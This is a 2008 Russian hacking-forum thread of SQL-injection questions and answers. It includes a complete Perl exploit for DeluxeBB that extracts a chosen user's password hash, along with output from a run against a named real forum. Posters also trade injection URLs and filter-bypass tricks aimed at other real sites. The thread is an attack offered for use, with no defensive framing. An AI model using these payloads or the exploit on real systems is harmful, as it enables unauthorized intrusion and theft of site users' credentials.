Ваши вопросы по уязвимостям.

30.05.2008, 08:18

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

С нами: 9501269

Репутация: 56

Цитата:

Сообщение от 1SeTh

чем можно заменить + или %20 и еще /**/ на что то другое?

%09, а вообще, почитай про "управляющие символы" здесь:
http://ru.wikipedia.org/

Последний раз редактировалось z3r0cool; 30.05.2008 в 08:41..

30.05.2008, 08:17

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

С нами: 10692266

Репутация: 3486

Цитата:

Сообщение от +toxa+

разделение запросов может быть если делать mysql_real_connect()

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

__________________
..

Последний раз редактировалось .Slip; 30.05.2008 в 08:26..

30.05.2008, 17:03

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от .Slip

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

Я говорю что вообще это вожможно)

Цитата:

Сообщение от 0nep@t0p

Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал

Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.

__________________

30.05.2008, 17:29

SeeJay

Новичок

Регистрация: 21.02.2006

Сообщений: 18

С нами: 10639863

Репутация: 1

Ребятки подскажите, пожалуйста, почему не работает Exploit.
Exploit…

Код:

#!/usr/bin/perl

use IO::Socket;


print q{
######################################################
#   DeluxeBB  Remote SQL Injection Exploit           #
#   vbulletin Remote SQL Injection Exploit           #
#      //  SekoMirza // Turkish Hackerz              #
######################################################
};

if (!$ARGV[2]) {

print q{ 
        Usage: perl dbbxpl.pl host /directory/ victim_userid 
  
       perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= 

"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED ";
print "[~] SENDING QUERY... ";
print $socket "GET $path HTTP/1.1 ";
print $socket "Host: $server ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
print "[+] DONE! ";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
     print "Password Hash is: ".$1." ";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}


}
print "------------------------------------------------------------------------------------------------\r\n";

#########################################################
#Shoutz:                                                #
#  							#
# My Sweet -> Caramel 					#
# For Mp3s -> Hypn0sis					#
# For Support -> [WwW.StarHack.Org]			#
# My Bro -> PhantomOrchid				#
# My Preceptor -> Earnk Kazno 				#
#########################################################

C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24

################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
--------------------------------------------------------------------------------
----------------
[>] SERVER: www.forum.profiforex.ru
[>] DIR: /
[>] USERID: 24
--------------------------------------------------------------------------------
----------------

[~] PREPARE TO CONNECT...
[+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]-----------------------
-------------------------------------------------------------
--------------------------------------------------------------------------------
----------------

Вернее он работает, но как-то не информативно.

30.05.2008, 11:13

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

С нами: 9501269

Репутация: 56

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

Используй ошибки для вывода данных.

http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)

30.05.2008, 11:17

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

С нами: 10869277

Репутация: 52

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

ммммм.... Обчный МССкуль=)

Код:

http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version

А на мой вопрос в этой теме так и не ответили((((
---
Не успел отправить=)

#10

30.05.2008, 13:59

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Чёт не разберусь никак с одной скулей...Может кто справится!?

Код:

http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL